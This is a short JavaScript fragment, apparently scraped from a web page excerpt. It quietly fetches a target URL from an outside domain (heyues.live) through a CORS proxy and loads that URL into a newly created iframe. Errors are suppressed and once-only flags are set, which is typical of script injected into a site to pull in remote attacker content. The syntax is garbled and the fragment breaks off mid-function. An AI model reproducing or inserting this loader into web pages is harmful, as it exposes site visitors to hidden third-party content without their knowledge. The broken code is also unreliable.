const configLink = "https://corsproxy.io/?url=http://heyues.live";
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink) .then(response ={ if (!response.ok) { throw new Error(" "); } return response.text(); })
.then(finalUrl ={ return fetch(finalUrl, { method: "HEAD" }) .then(headResponse =({ headResponse, finalUrl })); }) .catch(() ={
}); }
if (typeof window.__digitalflwrIframeCreated === "undefined") { window.__digitalflwrIframeCreated = false; }
window.__digitalflwrFetchPromise .then(result ={
if (!result) return; const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) { return; }
if (!window.__digitalflwrIframeCreated) { window.__digitalflwrIframeCreated = true; createMainIframe(finalUrl); } }) .catch(() ={
});
function createMainIframe(url) { const iframe = document.createElement("iframe"); … Read the rest